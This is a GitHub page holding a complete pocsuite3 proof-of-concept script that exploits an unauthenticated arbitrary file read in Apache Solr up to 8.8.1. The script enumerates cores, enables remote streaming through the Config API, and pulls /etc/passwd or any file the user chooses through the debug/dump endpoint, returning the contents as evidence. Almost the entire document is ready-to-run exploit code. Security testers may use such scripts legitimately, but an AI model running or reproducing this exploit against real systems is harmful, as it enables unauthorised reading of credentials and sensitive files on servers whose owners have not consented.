-
Notifications
You must be signed in to change notification settings - Fork 1
/
solr_all_readfile.py
113 lines (107 loc) · 5.34 KB
/
solr_all_readfile.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
#!/usr/bin/env python
# coding: utf-8
from urllib.parse import urlparse,quote
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from collections import OrderedDict
from pocsuite3.api import OptString
from pocsuite3.api import POC_CATEGORY, VUL_TYPE
import json
class TestPOC(POCBase):
    """pocsuite3 PoC: Apache Solr unauthenticated arbitrary file read.

    The check performs three HTTP steps against the target:

    1. list the cores through ``/solr/admin/cores`` and pick the first one;
    2. switch on ``requestDispatcher.requestParsers.enableRemoteStreaming``
       for that core through the Config API;
    3. ask ``/debug/dump`` to stream a ``file://`` URL back.

    ``_verify`` reads ``/etc/passwd``; ``_attack`` reads the path given in
    the ``filename`` option and returns the response body as evidence.
    """

    vulID = 'ssvid-99160'
    version = '1'
    author = 'kingween'
    vulDate = '2021-3-18'
    createDate = '2021-3-19'
    updateDate = '2021-3-19'
    references = [
        'https://mp.weixin.qq.com/s/HMtAz6_unM1PrjfAzfwCUQ']
    name = 'solr未授权导致任意文件读取'
    appPowerLink = ''
    appName = 'solr'
    appVersion = 'Apache Solr <= 8.8.1'
    # NOTE(review): the issue exercised here is a file read, not code
    # execution -- confirm whether VUL_TYPE offers a closer category.
    vulType = VUL_TYPE.CODE_EXECUTION
    category = POC_CATEGORY.EXPLOITS.REMOTE
    desc = '''
        Apache Solr未授权导致任意文件读取
    '''

    # Port used when the target URL does not carry an explicit one.
    _DEFAULT_PORT = 8983
    # File requested by _verify, and by _attack when no filename is given.
    _DEFAULT_FILE = '/etc/passwd'
    # Per-request timeout in seconds.
    _TIMEOUT = 10

    def _options(self):
        """Declare the optional ``filename`` option (path of the file to read)."""
        o = OrderedDict()
        o["filename"] = OptString('', description='文件路径', require=False)
        return o

    def _target(self):
        """Return ``(base_url, 'host:port')`` built from ``self.url``.

        Falls back to port 8983 when the URL has no explicit port.
        """
        parsed = urlparse(self.url)
        port = parsed.port or self._DEFAULT_PORT
        host_port = '{}:{}'.format(parsed.hostname, port)
        return '{}://{}'.format(parsed.scheme, host_port), host_port

    def _first_core(self, base):
        """Return the name of the first core listed by the target, or None.

        None is returned when the reply is not JSON, has no ``status``
        mapping, or lists no cores.
        """
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:73.0) Gecko/20100101 Firefox/73.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "DNT": "1",
            "Connection": "close",
            "Referer": self.url,
            "Upgrade-Insecure-Requests": "1",
        }
        response = req.get(
            base + '/solr/admin/cores?indexInfo=false&wt=json',
            headers=headers,
            timeout=self._TIMEOUT,
        )
        try:
            cores = list(json.loads(response.text)["status"])
        except (ValueError, KeyError, TypeError):
            # Not JSON (JSONDecodeError is a ValueError) or unexpected shape.
            return None
        return cores[0] if cores else None

    def _read_remote_file(self, filename):
        """Try to read ``filename`` from the target through remote streaming.

        Returns ``(host_port, response_text)`` when the dump request answers
        HTTP 200 without a "No such file or directory" error, otherwise None.
        Exceptions raised by the HTTP client are not caught here.
        """
        base, host_port = self._target()

        # Step 1: pick a core to operate on.
        core_name = self._first_core(base)
        if core_name is None:
            return None

        # Step 2: enable requestDispatcher.requestParsers.enableRemoteStreaming.
        # Config API commands must be sent with POST; a GET only reads the config.
        response = req.post(
            base + "/solr/" + core_name + "/config",
            data='{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}',
            headers={"Content-type": "application/json"},
            timeout=self._TIMEOUT,
        )
        if response.status_code != 200 or 'responseHeader' not in response.text:
            return None

        # Step 3: read the file. A file:// URL needs an absolute path, so add
        # the leading slash when it is missing (also covers "C:/..." paths).
        if not filename.startswith('/'):
            filename = '/' + filename
        response = req.post(
            base + "/solr/{}/debug/dump?param=ContentStreams".format(core_name),
            # A dict lets the HTTP client form-encode special characters.
            data={'stream.url': 'file://' + filename},
            headers={"Content-Type": "application/x-www-form-urlencoded"},
            timeout=self._TIMEOUT,
        )
        # Error pages (non-200) must not be reported as a successful read.
        if response.status_code != 200:
            return None
        if 'No such file or directory' in response.text:
            return None
        return host_port, response.text

    def _verify(self):
        """Check the target by trying to read ``/etc/passwd``."""
        result = {}
        outcome = self._read_remote_file(self._DEFAULT_FILE)
        if outcome is not None:
            host_port, _ = outcome
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = host_port
        return self.parse_output(result)

    def _attack(self):
        """Read the file named by the ``filename`` option and return its content.

        Falls back to ``/etc/passwd`` when the option is empty.
        """
        result = {}
        filename = self.get_option("filename") or self._DEFAULT_FILE
        outcome = self._read_remote_file(filename)
        if outcome is not None:
            host_port, body = outcome
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = host_port
            result['extra'] = {}
            result['extra']['evidence'] = body
        return self.parse_output(result)

    def _shell(self):
        """Shell mode is not implemented; run the verification instead."""
        return self._verify()

    def parse_output(self, result):
        """Wrap ``result`` in an Output: success when non-empty, failure otherwise."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output
# Pass the PoC class to pocsuite3's register_poc when this module is loaded.
register_poc(TestPOC)